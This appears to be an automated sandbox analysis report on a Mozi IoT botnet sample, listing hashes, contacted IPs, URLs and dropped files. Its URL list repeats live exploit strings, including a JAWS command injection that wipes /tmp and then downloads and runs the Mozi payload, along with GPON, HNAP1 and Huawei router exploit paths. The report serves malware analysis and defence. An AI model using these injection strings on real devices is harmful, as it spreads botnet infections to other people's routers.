We are hiring! Windows Kernel Developer (Remote), apply here!
flash

Mozi.m.3

Status: finished
Submission Time: 2022-01-28 13:56:42 +01:00
Malicious
Spreader
Trojan
Evader
Mirai

Comments

Tags

Details

  • Analysis ID:
    562113
  • API (Web) ID:
    929635
  • Analysis Started:
    2022-01-28 13:56:42 +01:00
  • Analysis Finished:
    2022-01-28 14:05:47 +01:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:
Full Report Management Report IOC Report Engine Info Verdict Score Reports

System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

malicious
100/100

malicious
32/49

malicious
24/35

malicious
21/28

malicious

IPs

IP Country Detection
142.78.223.105
Canada
149.31.223.0
United States
47.85.193.136
United States
Click to see the 97 hidden entries
185.79.226.70
Portugal
23.232.144.253
Japan
62.111.242.61
Poland
60.50.120.207
Malaysia
164.251.226.208
United States
173.94.112.119
United States
53.114.83.124
Germany
35.89.206.91
United States
95.240.239.88
Italy
218.39.19.65
Korea Republic of
156.4.225.43
United States
220.71.153.167
Korea Republic of
167.110.204.224
United States
182.170.213.106
Japan
43.126.201.126
Japan
39.147.161.154
China
177.249.12.60
Mexico
104.100.148.229
United States
166.106.1.246
unknown
202.222.4.253
Japan
35.60.164.149
United States
68.136.209.119
United States
211.4.101.192
Japan
169.137.244.247
United States
198.145.227.220
United States
39.38.182.96
Pakistan
93.13.215.74
France
34.186.100.193
United States
135.26.138.61
United States
152.114.122.105
United Kingdom
103.59.2.142
India
173.167.216.78
United States
194.97.213.242
Germany
165.41.240.146
United States
217.232.11.98
Germany
163.8.68.103
Australia
16.65.114.156
United States
220.205.132.232
China
20.238.169.86
United States
185.8.253.105
France
4.110.94.140
United States
32.174.73.232
United States
205.95.125.90
United States
130.68.103.209
United States
40.91.248.26
United States
11.230.142.52
United States
205.4.238.39
United States
113.129.113.246
China
4.171.59.186
United States
147.16.72.64
United States
80.59.253.0
Spain
98.245.32.216
United States
53.248.69.159
Germany
23.11.203.232
United States
218.72.91.66
China
44.87.205.17
United States
143.49.171.154
United States
145.55.9.226
United Kingdom
67.148.51.196
United States
135.192.237.245
United States
37.78.209.154
Russian Federation
208.115.182.29
United States
1.185.181.124
China
39.99.69.81
China
24.219.254.49
United States
130.114.149.2
United States
91.6.191.105
Germany
208.252.73.84
United States
37.133.231.78
Spain
185.239.176.62
Iraq
94.149.105.110
Denmark
117.207.90.45
India
139.112.91.231
Norway
175.244.101.90
Korea Republic of
172.206.179.220
United States
44.53.23.174
United States
154.62.137.64
United States
222.196.0.53
China
95.179.227.24
Netherlands
204.228.101.40
United States
154.123.11.110
Kenya
48.63.209.77
United States
204.180.37.241
United States
16.76.8.99
United States
170.145.194.147
United States
124.109.183.90
Japan
149.196.235.159
United Kingdom
6.11.213.232
United States
41.29.160.34
South Africa
124.225.149.1
China
69.103.186.241
United States
159.229.74.191
United States
57.219.0.139
Belgium
162.4.117.204
unknown
86.15.234.71
United Kingdom
124.13.95.167
Malaysia
142.94.252.227
Canada

Domains

Name IP Detection
dht.transmissionbt.com
87.98.162.88
bttracker.acc.umu.se
130.239.18.158
router.bittorrent.com
67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com
82.221.103.244
bttracker.debian.org
0.0.0.0

URLs

Name Detection
http://104.25.119.143:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://205.198.160.107:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://1.9.218.126:80/HNAP1/
Click to see the 51 hidden entries
http://23.58.36.209:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://23.6.123.60:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://178.32.54.199:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://81.108.37.251:80/HNAP1/
http://114.142.213.80:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://188.215.82.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://148.229.1.12:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://54.173.33.241:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://93.41.229.147:80/HNAP1/
http://162.209.132.128:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://186.219.131.213:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.57.42.173:80/HNAP1/
http://23.1.122.127:80/HNAP1/
http://%s:%d/bin.sh;chmod
http://13.35.5.125:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/bin.sh
http://23.44.16.109:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://154.209.180.104:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://171.25.175.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://87.17.124.195:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://%s:%d/Mozi.m
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://www.pastebin.ca/upload.php
http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
http://www.alsa-project.org.
http://154.93.41.99:37215/ctrlt/DeviceUpgrade_1
http://HTTP/1.1
http://schemas.xmlsoap.org/soap/envelope/
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.a;chmod
http://ipinfo.io/ip
http://%s:%d/Mozi.m;
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://www.alsa-project.org/cardinfo-db/
http://127.0.0.1sendcmd
http://121.151.98.14:80/HNAP1/
http://www.alsa-project.org
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://pastebin.ca)
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://schemas.xmlsoap.org/soap/encoding/
http://www.pastebin.ca.
http://%s:%d/Mozi.a;sh$
http://www.alsa-project.org/alsa-info.sh

Dropped files

Name File Type Hashes Detection
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/etc/profile.d/cedilla-portuguese.sh
ASCII text
#
/etc/profile.d/bash_completion.sh
ASCII text
#
Click to see the 97 hidden entries
/etc/profile.d/apps-bin-path.sh
ASCII text
#
/etc/profile.d/Z99-cloudinit-warnings.sh
ASCII text
#
/etc/profile.d/Z99-cloud-locale-test.sh
ASCII text
#
/etc/profile.d/Z97-byobu.sh
ASCII text
#
/etc/profile.d/01-locale-fix.sh
ASCII text
#
/etc/init.d/keyboard-setup.sh
ASCII text
#
/etc/init.d/hwclock.sh
ASCII text
#
/etc/init.d/console-setup.sh
ASCII text
#
/usr/bin/rescan-scsi-bus.sh
ASCII text
#
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
#
/etc/profile.d/gawk.sh
ASCII text
#
/etc/profile.d/im-config_wayland.sh
ASCII text
#
/etc/profile.d/vte-2.91.sh
ASCII text
#
/etc/profile.d/xdg_dirs_desktop_session.sh
ASCII text
#
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/usr/bin/gettext.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
#
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
#
/usr/share/doc/python3-colorama/examples/demo.sh
ASCII text
#
/usr/share/doc/python3-serial/examples/port_publisher.sh
ASCII text
#
/usr/share/doc/sg3-utils/examples/sg_persist_tst.sh
ASCII text
#
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
#
/usr/share/doc/git/contrib/vscode/init.sh
ASCII text
#
/usr/share/doc/git/contrib/update-unicode/update_unicode.sh
ASCII text
#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
#
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
#
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
#
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
#
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
#
/usr/src/linux-headers-5.4.0-81/Documentation/features/list-arch.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/arch/arm64/boot/install.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscalltbl.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallnr.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallhdr.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/arch/arm/boot/install.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/arch/arm/boot/deflate_xip_data.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/Documentation/sound/cards/multisound.sh
C source, ASCII text
#
/usr/src/linux-headers-5.4.0-81/Documentation/s390/config3270.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/Documentation/features/scripts/features-refresh.sh
ASCII text
#
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/Documentation/arm64/kasan-offsets.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/udev-install.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/status.sh
ASCII text
#
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/autoload.sh
ASCII text
#
/usr/share/vim/vim81/macros/less.sh
ASCII text
#
/usr/share/session-migration/scripts/01-usd-migration-monitors-xml.sh
ASCII text
#
/usr/share/os-prober/common.sh
ASCII text
#
/usr/share/lightdm/guest-session/setup.sh
ASCII text
#
/usr/share/hplip/hplip_clean.sh
ASCII text
#
/etc/wpa_supplicant/action_wpa.sh
ASCII text
#
/usr/share/cups/braille/index.sh
ASCII text
#
/usr/share/cups/braille/cups-braille.sh
ASCII text, with CR, LF line terminators
#
/usr/share/brltty/initramfs/brltty.sh
ASCII text
#
/usr/share/alsa/utils.sh
ASCII text
#
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
#
/usr/share/PackageKit/helpers/test_spawn/search-name.sh
ASCII text
#
/tmp/.config
ASCII text
#
/etc/wpa_supplicant/ifupdown.sh
ASCII text
#
/etc/wpa_supplicant/functions.sh
ASCII text
#
/usr/share/cups/braille/indexv3.sh
ASCII text
#
/etc/gdm3/config-error-dialog.sh
ASCII text
#
/etc/console-setup/cached_setup_terminal.sh
ASCII text
#
/etc/console-setup/cached_setup_keyboard.sh
ASCII text
#
/etc/console-setup/cached_setup_font.sh
ASCII text
#
/etc/acpi/undock.sh
ASCII text
#
/etc/acpi/tosh-wireless.sh
ASCII text
#
/etc/acpi/ibm-wireless.sh
ASCII text
#
/etc/acpi/asus-wireless.sh
ASCII text
#
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
#
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
#
/usr/share/doc/git/contrib/diff-highlight/t/t9400-diff-highlight.sh
ASCII text
#
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh
ASCII text
#
/usr/share/doc/git/contrib/coverage-diff.sh
ASCII text
#
/usr/share/doc/gdb/contrib/words.sh
ASCII text
#
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
#
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
#
/boot/grub/i386-pc/modinfo.sh
ASCII text
#
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
#
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
#
/usr/share/doc/bubblewrap/examples/flatpak-run.sh
ASCII text
#
/usr/share/doc/bubblewrap/examples/bubblewrap-shell.sh
ASCII text
#
/usr/share/doc/acpid/examples/powerbtn.sh
ASCII text
#
/usr/share/doc/acpid/examples/default.sh
ASCII text
#
/usr/share/doc/acpid/examples/ac.sh
ASCII text
#
/usr/share/debconf/confmodule.sh
ASCII text
#
/usr/share/cups/braille/indexv4.sh
ASCII text
#